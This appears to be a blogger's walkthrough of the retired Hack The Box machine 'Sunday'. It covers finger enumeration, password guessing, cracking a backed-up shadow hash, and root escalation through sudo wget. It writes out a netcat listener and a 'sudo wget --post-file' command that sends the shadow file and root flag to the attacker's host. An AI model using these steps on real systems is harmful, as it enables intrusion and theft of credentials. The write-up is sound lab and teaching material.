With Sunday’s retirement today, I finally get to write my first Hack The Box write-up. I cannot tell you how exciting that is, but Borat can:
Sunday was a bit on the easier side, but in the end, taught me a new tricks I had never seen before. The box reminded me of my days in the PWK labs, enumerating the hell out of everything possible to find a foothold. That’s Sunday in a nutshell: enumeration. Let’s take a look and see how it’s done.
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-29 10:04 EDT Nmap scan report for 10.10.10.76 Host is up (0.042s latency). PORT STATE SERVICE VERSION 79/tcp open finger Sun Solaris fingerd | finger: Login Name TTY Idle When Where\x0D |_sunny sunny pts/2 Sat 13:56 10.10.14.14 \x0D 111/tcp open rpcbind 2-4 (RPC #100000) 22022/tcp open ssh SunSSH 1.3 (protocol 2.0) | ssh-hostkey: | 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA) |_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA) 38768/tcp closed unknown 56893/tcp closed unknown No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.70%E=4%D=9/29%OT=79%CT=38768%CU=35637%PV=Y%DS=2%DC=T%G=Y%TM=5BA OS:F8680%P=x86_64-pc-linux-gnu)SEQ(SP=9D%GCD=1%ISR=A4%TI=I%CI=I%II=I%SS=S%T OS:S=7)OPS(O1=NNT11M54DNW0NNS%O2=NNT11M54DNW0NNS%O3=NNT11M54DNW0%O4=NNT11M5 OS:4DNW0NNS%O5=NNT11M54DNW0NNS%O6=NNT11M54DNNS)WIN(W1=C265%W2=C265%W3=C1CC% OS:W4=C068%W5=C068%W6=C0B7)ECN(R=Y%DF=Y%T=3C%W=C421%O=M54DNW0NNS%CC=Y%Q=)T1 OS:(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6( OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=Y%T=FF%IPL=70% OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=FF%CD=S) Network Distance: 2 hops Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos TRACEROUTE (using port 56893/tcp) HOP RTT ADDRESS 1 41.78 ms 10.10.14.1 2 42.02 ms 10.10.10.76 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.92 seconds
As you can see from the full port scan, we have a few interesting ports open:
- Finger on 79
- RPC on 111
- SSH on 22022
What stands out immediately to me are the finger and SSH ports. The finger service is a user information service. Basically, you can use this service to see information about users that are logged in. Immediately, we can identify the user Sunny using the finger service. If we wanted to attempt to identify more users, we can use the Metasploit module, auxiliary/scanner/finger/finger_users. For fun, let’s finger some users:
As you can see, we pick up even more users for further enumeration. These users will not be relevant in our effort to root the machine, but I wanted to demonstrate how to further enumerate the finger service in case you, the reader, were ever to encounter it again.
So, we have a user and we have an SSH port on 22022, running SunSSH 1.3. My first thoughts are to search for SunSSH exploits and see if anything can be found. That’s a negative Ghost Rider.
Well, that leaves us with a couple of options: brute force our way in with SSH or a password guessing attack. I always opt for a password guessing attack first. Usually, lower users are not hiding behind incredibly complicated passwords. I decided to try a few passwords out for Sunny until something stuck. The password was…..sunday.
Now we have our foothold:
I went to obtain the user flag from its normal location on the desktop and it wasn’t there. Shit, we’re going to have to work harder than I had hoped. I did a little investigating to see if I was a sudoer. I was not. I had no special privileges that I could see with a quick glance. So, it was time to enumerate. Let’s ls / and see if anything stands out:
Do you see it? Any time I see a folder called “backup”, I am immediately interested. Let’s take a look at what’s inside:
Ignore the index.html, somebody’s kid put that there. The two files of interest are the agent22.backup and the shadow.backup. If you’re new to this, the shadow file contains the hashes for users and is usually only accessible by root and those in the sudoers file. Let’s see what these files actually contain:
So, no luck on agent22.backup, but we have another user hash! Now, there are a couple things we can do here, but all paths lead to cracking. First, we can dump the /etc/passwd file which contains all the users on the system along with this shadow file and combine them with a tool called unshadow. We can then take that unshadowed file and run it through a password cracker like John the Ripper. The other step is, we can just grab the hash in front of us and run it through hashcat more immediately. I like immediacy.
We need to identify the hash here. If this is your first rodeo, we can do that by looking at the number after the first $. The number here is 5, which indicates that we are looking at a SHA-256 hash. Knowing your hash type is important as we must identify the hash type in hashcat. Let’s take a look at the syntax I used:
So, we’re running hashcat against our SHA-256 hash, which I named shadowed.txt and used the password file of rockyou.txt in an attempt to crack the hash. Here are the results:
Seriously though, we’ve cracked another user and have another foothold. Let’s log in as the user and see if we can find a flag now.
Finally, we have our lower user. Again, I did my usual privesc tactics. I checked to see if my user was in sudoers and what privileges he or she had. One fancy command you can run to see what sudo access you have is: sudo -l. This command will tell you what commands you can run as sudo on the system. Let’s take a look at what we’ve got:
Okay, so we can run wget as sudo. Wow, a command that can download files. We can also download files with wget as user, so what’s the benefit here? Well, you can actually transfer files using wget as well. You’ll need to do the following:
Attacker: Set up a netcat listener. nc -nvlp 8081 is what I used.
Victim: Send wget commands as such: sudo wget –post-file=<file> <ip>:<port>
It should look something like this:
Here, we’re sending a request for the shadow file. We receive it on the other end:
Awesome, we got the root hash. However, I’m lazy and want to get this over with. Let’s see if we can just send the root flag over and end this:
Sunday by no means was a difficult box, but I think it teaches a good lesson to those who are new to hacking, which is enumerate. A lot of users forget to scan the higher ports, which is where SSH was found. A lot of users also forget to look around the file system, which is where we found our backup folder with the shadow hashes. Some basic enumeration goes a long way.